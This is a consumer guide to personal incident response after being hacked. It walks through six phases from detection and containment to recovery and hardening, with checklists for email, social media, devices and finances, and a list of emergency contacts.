Incident response is the systematic approach to managing and recovering from a security breach. When you discover you've been hacked, every minute counts. This guide walks you through the entire process – from detection to recovery and hardening.
First 15 minutes are critical. Follow these steps in order to minimize damage and regain control.
The 6 Phases
1. Detection
Identify that something is wrong
2. Containment
Stop the bleeding immediately
3. Eradication
Remove the attacker's access
4. Recovery
Restore normal operations
5. Analysis
Understand what happened
6. Hardening
Prevent future attacks
Phase 1: Detection
How do you know you've been hacked? Common signs include:
Account alerts: Password changed emails you didn't request
Unusual activity: Posts, messages, or purchases you didn't make
Can't log in: Password suddenly "incorrect"
Device behavior: Slow performance, pop-ups, new toolbars
Bank alerts: Unknown transactions or card charges
Friends reporting: They received strange messages from you
Trust your gut. If something feels off, investigate immediately.
Phase 2: Immediate Containment
0-1 min
Disconnect from internet – Pull the ethernet cable, disable Wi-Fi, turn on airplane mode. This stops remote access and ongoing data theft.
1-2 min
Unplug external drives – Prevent ransomware from encrypting backups.
2-5 min
Use a clean device – Grab a friend's phone, work computer, or tablet that isn't compromised.
5-10 min
Change critical passwords – Start with your primary email, then banking, then social media. Use the clean device.
Password tip: Use long, unique passwords (15+ characters). A password manager helps.
Phase 3: Eradication
Now you need to remove the attacker's access completely:
Email Accounts
✓ Change password
✓ Enable 2FA (authenticator app)
✓ Check forwarding rules
✓ Review filters
✓ Check connected apps
✓ Sign out all devices
Social Media
✓ Change password
✓ Check authorized apps
✓ Review login activity
✓ Remove unknown devices
✓ Check for unauthorized posts
Devices
✓ Run offline malware scan
✓ Check for unknown users
✓ Review startup programs
✓ Update all software
✓ Consider OS reinstall
Financial
✓ Call bank fraud line
✓ Freeze cards
✓ Review transactions
✓ Change online banking password
✓ Check payment methods
Phase 4: Recovery
Once you've removed the attacker, it's time to restore normal operations:
Restore from clean backups – If files were encrypted or deleted
Reset all passwords again – Yes, again. On the now-clean device
Enable 2FA everywhere – Every account that supports it
Update recovery information – Ensure email/phone are yours
Notify contacts – If attacker sent spam from your accounts
You're back in control. Take a breath. Now let's make sure it doesn't happen again.
Phase 5: Analysis
Understanding how you were hacked helps prevent future incidents:
How did they get in? Phishing? Weak password? Malware? SIM swap?
What did they access? Check account activity logs
When did it start? Look for the first suspicious event
Check for backdoors: Hidden rules, forwarding, connected apps
Check haveibeenpwned.com – See if your email was in a data breach
Document everything. Screenshots, timestamps, and notes help if you need to involve authorities.
Phase 6: Hardening
Lock down your digital life to prevent future attacks:
Essential
✓ Use a password manager
✓ Enable 2FA everywhere
✓ Use authenticator app (not SMS)
✓ Regular software updates
✓ Unique passwords for every site
Advanced
✓ Hardware security key (YubiKey)
✓ Set port-out PIN with mobile carrier
✓ Freeze your credit
✓ Use alias emails for signups
✓ Regular security audits
Emergency Contacts
Save these for quick access:
Bank fraud lines: Number on back of your card
Mobile carrier: To report SIM swap attempts
Local police: For identity theft reports
FTC Identity Theft: identitytheft.gov
IC3: ic3.gov (FBI cyber crime)
Printable Checklist
Emergency Incident Response Checklist
Print this and keep it somewhere safe. When disaster strikes, you won't have to think – just follow the steps.
Remember: Stay calm, follow the phases, and you'll get through this. We're here to help.